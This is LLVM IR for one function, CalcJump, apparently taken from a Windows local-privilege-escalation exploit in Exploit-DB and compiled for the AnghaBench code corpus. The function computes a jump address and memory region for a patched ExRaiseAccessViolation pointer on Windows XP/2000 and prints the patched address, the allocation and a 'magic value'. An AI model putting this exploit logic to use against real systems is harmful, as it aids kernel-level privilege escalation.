; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/windows/local/extr_28764.c_CalcJump.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/windows/local/extr_28764.c_CalcJump.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@WXP_EXCEPTION = common dso_local global i32 0, align 4
@W2K_EXCEPTION = common dso_local global i32 0, align 4
@.str = private unnamed_addr constant [15 x i8] c"\0AINFORMATION \0A\00", align 1
@.str.1 = private unnamed_addr constant [55 x i8] c"-----------------------------------------------------\0A\00", align 1
@.str.2 = private unnamed_addr constant [53 x i8] c"Patched ExRaiseAccessViolation pointing to \09 [0x%p]\0A\00", align 1
@.str.3 = private unnamed_addr constant [39 x i8] c"0xF000h bytes allocated  at \09\09 [0x%p]\0A\00", align 1
@.str.4 = private unnamed_addr constant [25 x i8] c"Magic Value\09\09\09\09 [0x%p]\0A\0A\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @CalcJump(i32 %0, i64 %1, i32* %2, i32* %3) #0 {
  %5 = alloca i32, align 4
  %6 = alloca i64, align 8
  %7 = alloca i32*, align 8
  %8 = alloca i32*, align 8
  %9 = alloca i32, align 4
  %10 = alloca i32, align 4
  %11 = alloca i32, align 4
  %12 = alloca i32, align 4
  %13 = alloca i32, align 4
  %14 = alloca i32, align 4
  store i32 %0, i32* %5, align 4
  store i64 %1, i64* %6, align 8
  store i32* %2, i32** %7, align 8
  store i32* %3, i32** %8, align 8
  %15 = load i64, i64* %6, align 8
  %16 = icmp ne i64 %15, 0
  br i1 %16, label %17, label %22

17:                                               ; preds = %4
  %18 = load i32, i32* %5, align 4
  %19 = load i32, i32* @WXP_EXCEPTION, align 4
  %20 = add nsw i32 %18, %19
  %21 = add nsw i32 %20, 14
  store i32 %21, i32* %9, align 4
  store i32 25784, i32* %14, align 4
  br label %27

22:                                               ; preds = %4
  %23 = load i32, i32* %5, align 4
  %24 = load i32, i32* @W2K_EXCEPTION, align 4
  %25 = add nsw i32 %23, %24
  %26 = add nsw i32 %25, 14
  store i32 %26, i32* %9, align 4
  store i32 21336, i32* %14, align 4
  br label %27

27:                                               ; preds = %22, %17
  store i32 76, i32* %11, align 4
  br label %28

28:                                               ; preds = %54, %27
  %29 = load i32, i32* %11, align 4
  %30 = icmp slt i32 %29, 56796
  br i1 %30, label %31, label %57

31:                                               ; preds = %28
  %32 = load i32, i32* %11, align 4
  %33 = mul nsw i32 %32, 65536
  %34 = load i32, i32* %14, align 4
  %35 = add nsw i32 %33, %34
  %36 = xor i32 %35, -1
  store i32 %36, i32* %12, align 4
  %37 = load i32, i32* %9, align 4
  %38 = load i32, i32* %12, align 4
  %39 = sub nsw i32 %37, %38
  store i32 %39, i32* %13, align 4
  %40 = load i32, i32* %13, align 4
  %41 = icmp sgt i32 %40, 234881024
  br i1 %41, label %42, label %53

42:                                               ; preds = %31
  %43 = load i32, i32* %13, align 4
  %44 = icmp slt i32 %43, 251658240
  br i1 %44, label %45, label %53

45:                                               ; preds = %42
  %46 = load i32, i32* %13, align 4
  %47 = and i32 %46, -4096
  store i32 %47, i32* %10, align 4
  %48 = load i32, i32* %11, align 4
  %49 = sub nsw i32 %48, 4
  %50 = load i32*, i32** %7, align 8
  store i32 %49, i32* %50, align 4
  %51 = load i32, i32* %13, align 4
  %52 = load i32*, i32** %8, align 8
  store i32 %51, i32* %52, align 4
  br label %57

53:                                               ; preds = %42, %31
  br label %54

54:                                               ; preds = %53
  %55 = load i32, i32* %11, align 4
  %56 = add nsw i32 %55, 4
  store i32 %56, i32* %11, align 4
  br label %28

57:                                               ; preds = %45, %28
  %58 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([15 x i8], [15 x i8]* @.str, i64 0, i64 0))
  %59 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([55 x i8], [55 x i8]* @.str.1, i64 0, i64 0))
  %60 = load i32, i32* %13, align 4
  %61 = sub nsw i32 %60, 1
  %62 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([53 x i8], [53 x i8]* @.str.2, i64 0, i64 0), i32 %61)
  %63 = load i32, i32* %10, align 4
  %64 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([39 x i8], [39 x i8]* @.str.3, i64 0, i64 0), i32 %63)
  %65 = load i32, i32* %11, align 4
  %66 = sub nsw i32 %65, 4
  %67 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([25 x i8], [25 x i8]* @.str.4, i64 0, i64 0), i32 %66)
  %68 = load i32, i32* %10, align 4
  ret i32 %68
}

declare dso_local i32 @printf(i8*, ...) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
